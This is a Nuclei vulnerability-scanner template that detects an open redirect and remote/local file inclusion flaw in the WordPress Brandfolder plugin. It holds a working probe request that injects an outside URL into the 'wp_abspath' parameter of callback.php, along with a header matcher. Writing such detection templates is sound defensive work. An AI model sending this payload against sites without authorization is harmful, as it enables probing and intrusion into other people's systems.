id: brandfolder-open-redirect

info:
  name: WordPress Brandfolder - Open Redirect (RFI & LFI)
  author: 0x_Akoko
  severity: medium
  description: |
    WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
  reference:
    - https://www.exploit-db.com/exploits/39591
    - https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1
  metadata:
    max-request: 1
  tags: wp,brandfolder,edb,wpscan,wp-plugin,redirect,rfi,wordpress,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

# digest: 490a00463044022003f8b08dce1cd4282d793ac6bc1a75256f4269204e387f64ddb48846e1c34af3022067429b03cab7d8b7e3a4f5f4b7267df156f5cc8e3aee9ae1754f6276d438ddc0:922c64590222798bb761d5b6d8e72950
